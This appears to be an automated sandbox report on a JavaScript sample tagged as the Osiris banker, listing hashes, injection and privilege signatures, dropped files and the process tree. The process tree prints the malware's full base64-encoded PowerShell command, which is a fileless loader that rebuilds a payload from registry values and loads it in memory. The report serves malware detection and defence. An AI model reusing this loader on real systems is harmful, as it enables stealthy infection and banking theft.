osiris | a0081f88e43338810fe23bd2e1fba8857b45f4378df38fc0c217426468b924fc

General

Target

kronos.js
Size

2.5MB
MD5

bd52c3fcb98700992066743b021876dd
SHA1

c711676cf2dadffa73b3bd03de01fc3e6ea4e892
SHA256

a0081f88e43338810fe23bd2e1fba8857b45f4378df38fc0c217426468b924fc
SHA512

24b6831f75736ba70ba8fd00263391e220c7e7cbf3c0d9ed1bfb24f92384a4694282509864d139950afaa910a2c278371354e61a51348b652419bd9c405d7e3b

Score

10^/10

osiris banker botnet

Malware Config

Signatures

Osiris
banker botnet osiris
Executes dropped EXE 1 IoCs

Processes:

GetX64BTIT.exe

pid process

4092 GetX64BTIT.exe
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

16 api.ipify.org
17 api.ipify.org
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 3772 set thread context of 732 3772 powershell.exe ImagingDevices.exe

pid	process
4092	GetX64BTIT.exe

flow	ioc
16	api.ipify.org
17	api.ipify.org

description	pid	process	target process
PID 3772 set thread context of 732	3772	powershell.exe	ImagingDevices.exe

Suspicious behavior: EnumeratesProcesses 6889 IoCs

Processes:

powershell.exeImagingDevices.exe

pid	process
3772	powershell.exe
3772	powershell.exe
3772	powershell.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe
732	ImagingDevices.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 3772 powershell.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

ImagingDevices.exe

pid process

732 ImagingDevices.exe

description	pid	process
Token: SeDebugPrivilege	3772	powershell.exe

pid	process
732	ImagingDevices.exe

Suspicious use of WriteProcessMemory 17 IoCs

Processes:

wscript.execmd.exepowershell.exeImagingDevices.exe

description	pid	process	target process
PID 880 wrote to memory of 804	880	wscript.exe	cmd.exe
PID 880 wrote to memory of 804	880	wscript.exe	cmd.exe
PID 804 wrote to memory of 3772	804	cmd.exe	powershell.exe
PID 804 wrote to memory of 3772	804	cmd.exe	powershell.exe
PID 804 wrote to memory of 3772	804	cmd.exe	powershell.exe
PID 3772 wrote to memory of 732	3772	powershell.exe	ImagingDevices.exe
PID 3772 wrote to memory of 732	3772	powershell.exe	ImagingDevices.exe
PID 3772 wrote to memory of 732	3772	powershell.exe	ImagingDevices.exe
PID 3772 wrote to memory of 732	3772	powershell.exe	ImagingDevices.exe
PID 3772 wrote to memory of 732	3772	powershell.exe	ImagingDevices.exe
PID 3772 wrote to memory of 732	3772	powershell.exe	ImagingDevices.exe
PID 3772 wrote to memory of 732	3772	powershell.exe	ImagingDevices.exe
PID 3772 wrote to memory of 732	3772	powershell.exe	ImagingDevices.exe
PID 3772 wrote to memory of 732	3772	powershell.exe	ImagingDevices.exe
PID 3772 wrote to memory of 732	3772	powershell.exe	ImagingDevices.exe
PID 732 wrote to memory of 4092	732	ImagingDevices.exe	GetX64BTIT.exe
PID 732 wrote to memory of 4092	732	ImagingDevices.exe	GetX64BTIT.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\kronos.js
1⤵
- Suspicious use of WriteProcessMemory
PID:880

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "PAAjACAAbwBmAHEAZgBzAGcAZAAgACMAPgAkAHUAPQAkAGUAbgB2ADoAVQBzAGUAcgBOAGEAbQBlADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgADcAMAAwADsAJABpACsAKwApAHsAJABjAD0AIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXAAiACsAJAB1ACsAIgAxACIAOwBUAHIAeQB7ACQAYQA9ACQAYQArACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AcABhAHQAaAAgACQAYwApAC4AJABpAH0AQwBhAHQAYwBoAHsAfQB9ADsAZgB1AG4AYwB0AGkAbwBuACAAYwBoAGIAYQB7AFsAYwBtAGQAbABlAHQAYgBpAG4AZABpAG4AZwAoACkAXQBwAGEAcgBhAG0AKABbAHAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUAKQBdAFsAUwB0AHIAaQBuAGcAXQAkAGgAcwApADsAJABCAHkAdABlAHMAIAA9ACAAWwBiAHkAdABlAFsAXQBdADoAOgBuAGUAdwAoACQAaABzAC4ATABlAG4AZwB0AGgAIAAvACAAMgApADsAZgBvAHIAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAaABzAC4ATABlAG4AZwB0AGgAOwAgACQAaQArAD0AMgApAHsAJABCAHkAdABlAHMAWwAkAGkALwAyAF0AIAA9ACAAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAHkAdABlACgAJABoAHMALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAAMgApACwAIAAxADYAKQB9ACQAQgB5AHQAZQBzAH0AOwAkAGkAIAA9ACAAMAA7AFcAaABpAGwAZQAgACgAJABUAHIAdQBlACkAewAkAGkAKwArADsAJABrAG8AIAA9ACAAWwBtAGEAdABoAF0AOgA6AFMAcQByAHQAKAAkAGkAKQA7AGkAZgAgACgAJABrAG8AIAAtAGUAcQAgADEAMAAwADAAKQB7ACAAYgByAGUAYQBrAH0AfQBbAGIAeQB0AGUAWwBdAF0AJABiACAAPQAgAGMAaABiAGEAKAAkAGEALgByAGUAcABsAGEAYwBlACgAIgAjACIALAAkAGsAbwApACkAOwBbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgApADsAWwBNAG8AZABlAF0AOgA6AFMAZQB0AHUAcAAoACkAOwA= "
2⤵
- Suspicious use of WriteProcessMemory
PID:804

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "PAAjACAAbwBmAHEAZgBzAGcAZAAgACMAPgAkAHUAPQAkAGUAbgB2ADoAVQBzAGUAcgBOAGEAbQBlADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgADcAMAAwADsAJABpACsAKwApAHsAJABjAD0AIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXAAiACsAJAB1ACsAIgAxACIAOwBUAHIAeQB7ACQAYQA9ACQAYQArACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AcABhAHQAaAAgACQAYwApAC4AJABpAH0AQwBhAHQAYwBoAHsAfQB9ADsAZgB1AG4AYwB0AGkAbwBuACAAYwBoAGIAYQB7AFsAYwBtAGQAbABlAHQAYgBpAG4AZABpAG4AZwAoACkAXQBwAGEAcgBhAG0AKABbAHAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUAKQBdAFsAUwB0AHIAaQBuAGcAXQAkAGgAcwApADsAJABCAHkAdABlAHMAIAA9ACAAWwBiAHkAdABlAFsAXQBdADoAOgBuAGUAdwAoACQAaABzAC4ATABlAG4AZwB0AGgAIAAvACAAMgApADsAZgBvAHIAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAaABzAC4ATABlAG4AZwB0AGgAOwAgACQAaQArAD0AMgApAHsAJABCAHkAdABlAHMAWwAkAGkALwAyAF0AIAA9ACAAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAHkAdABlACgAJABoAHMALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAAMgApACwAIAAxADYAKQB9ACQAQgB5AHQAZQBzAH0AOwAkAGkAIAA9ACAAMAA7AFcAaABpAGwAZQAgACgAJABUAHIAdQBlACkAewAkAGkAKwArADsAJABrAG8AIAA9ACAAWwBtAGEAdABoAF0AOgA6AFMAcQByAHQAKAAkAGkAKQA7AGkAZgAgACgAJABrAG8AIAAtAGUAcQAgADEAMAAwADAAKQB7ACAAYgByAGUAYQBrAH0AfQBbAGIAeQB0AGUAWwBdAF0AJABiACAAPQAgAGMAaABiAGEAKAAkAGEALgByAGUAcABsAGEAYwBlACgAIgAjACIALAAkAGsAbwApACkAOwBbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgApADsAWwBNAG8AZABlAF0AOgA6AFMAZQB0AHUAcAAoACkAOwA= "
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3772

C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:732

C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe
"C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe"
5⤵
- Executes dropped EXE
PID:4092

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe

MD5
b4cd27f2b37665f51eb9fe685ec1d373

SHA1
7f08febf0fdb7fc9f8bf35a10fb11e7de431abe0

SHA256
91f1023142b7babf6ff75dad984c2a35bde61dc9e61f45483f4b65008576d581

SHA512
e025f65224d78f5fd0abebe281ac0d44a385b2641e367cf39eed6aefada20a112ac47f94d7febc4424f1db6a6947bac16ff83ef93a8d745b3cddfdbe64c49a1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe

MD5
b4cd27f2b37665f51eb9fe685ec1d373

SHA1
7f08febf0fdb7fc9f8bf35a10fb11e7de431abe0

SHA256
91f1023142b7babf6ff75dad984c2a35bde61dc9e61f45483f4b65008576d581

SHA512
e025f65224d78f5fd0abebe281ac0d44a385b2641e367cf39eed6aefada20a112ac47f94d7febc4424f1db6a6947bac16ff83ef93a8d745b3cddfdbe64c49a1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\x64btit.txt

MD5
a8c080a673eaa56a3250e9eade588aeb

SHA1
822eeed497cb3ba4801b7804d49b1b4a1712ca57

SHA256
10d3192452e3ab16442cfe16568a9b4b68c303481a2a6d26f1bfd05517737b09

SHA512
62321b8668c438e661efdefa7f9cfefb53e313ee01036254b9f222b138e0bb80eeeaad67bf9b8144ffe4b636c3a4b549a2513c1559f78f4806ad49ca037e02ca

Download Submit
memory/732-20-0x0000000000400000-0x0000000000456000-memory.dmp

Filesize
344KB

Download
memory/732-22-0x0000000000400000-0x0000000000456000-memory.dmp

Filesize
344KB

Download
memory/732-21-0x0000000000401698-mapping.dmp

Download
memory/804-2-0x0000000000000000-mapping.dmp

Download
memory/3772-8-0x0000000007A50000-0x0000000007A51000-memory.dmp

Filesize
4KB

Download
memory/3772-18-0x0000000009A30000-0x0000000009A32000-memory.dmp

Filesize
8KB

Download
memory/3772-11-0x00000000088B0000-0x00000000088B1000-memory.dmp

Filesize
4KB

Download
memory/3772-12-0x0000000008C50000-0x0000000008C51000-memory.dmp

Filesize
4KB

Download
memory/3772-13-0x0000000008B20000-0x0000000008B21000-memory.dmp

Filesize
4KB

Download
memory/3772-14-0x0000000009960000-0x0000000009961000-memory.dmp

Filesize
4KB

Download
memory/3772-15-0x00000000098C0000-0x00000000098C1000-memory.dmp

Filesize
4KB

Download
memory/3772-16-0x00000000098E0000-0x00000000098E1000-memory.dmp

Filesize
4KB

Download
memory/3772-17-0x000000000A190000-0x000000000A191000-memory.dmp

Filesize
4KB

Download
memory/3772-10-0x0000000008560000-0x0000000008561000-memory.dmp

Filesize
4KB

Download
memory/3772-19-0x0000000009D80000-0x0000000009ECC000-memory.dmp

Filesize
1.3MB

Download
memory/3772-9-0x0000000007AC0000-0x0000000007AC1000-memory.dmp

Filesize
4KB

Download
memory/3772-7-0x00000000079B0000-0x00000000079B1000-memory.dmp

Filesize
4KB

Download
memory/3772-6-0x0000000007C70000-0x0000000007C71000-memory.dmp

Filesize
4KB

Download
memory/3772-3-0x0000000000000000-mapping.dmp

Download
memory/3772-5-0x0000000005010000-0x0000000005011000-memory.dmp

Filesize
4KB

Download
memory/3772-4-0x00000000734E0000-0x0000000073BCE000-memory.dmp

Filesize
6.9MB

Download
memory/4092-23-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing